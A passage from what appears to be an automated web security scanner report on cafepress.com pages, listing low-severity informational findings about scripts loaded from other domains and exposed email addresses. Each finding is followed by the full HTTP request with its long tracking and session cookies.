__utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.69. http://www.cafepress.com/make/personalized-ornaments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 54240
Date: Sun, 26 Dec 2010 13:47:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css">
<script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"></script>
...[SNIP]...

5.70. http://www.cafepress.com/sk/TheGamingApe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/sk/TheGamingApe

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://content6.cpcache.com/js/jquery/jcarousel/lib/jquery.jcarousel.js
http://content7.cpcache.com/marketplace/js/sarissa_ieemu_xpath.js
http://content9.cpcache.com/marketplace/js/sarissa.js

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 174544
Date: Sun, 26 Dec 2010 13:48:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 174544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<div id="mainContent">

<script language="JavaScript1.1" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
<script language="javascript" src="http://content9.cpcache.com/marketplace/js/sarissa.js"></script>
<script language="javascript" src="http://content7.cpcache.com/marketplace/js/sarissa_ieemu_xpath.js"></script>
<script type="text/javascript" src="http://content6.cpcache.com/js/jquery/jcarousel/lib/jquery.jcarousel.js"></script>
...[SNIP]...

6. Email addresses disclosed previous next
There are 11 instances of this issue:

/TheGamingApe
/make/custom-baby-gear
/make/custom-buttons
/make/custom-ipad-case
/make/custom-iphone-cases
/make/custom-stickers
/make/custom-stockings
/make/custom-thermos
/make/custom-water-bottles
/make/personalized-gifts
/make/personalized-ornaments

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

6.1. http://www.cafepress.com/TheGamingApe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/TheGamingApe

Issue detail

The following email address was disclosed in the response:

contact@thegamingape.com

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.2. http://www.cafepress.com/make/custom-baby-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.3. http://www.cafepress.com/make/custom-buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.4. http://www.cafepress.com/make/custom-ipad-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.5. http://www.cafepress.com/make/custom-iphone-cases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The following email address was disclosed in the response:

eteamz@CafePress.com

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.6. http://www.cafepress.com/make/custom-stickers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
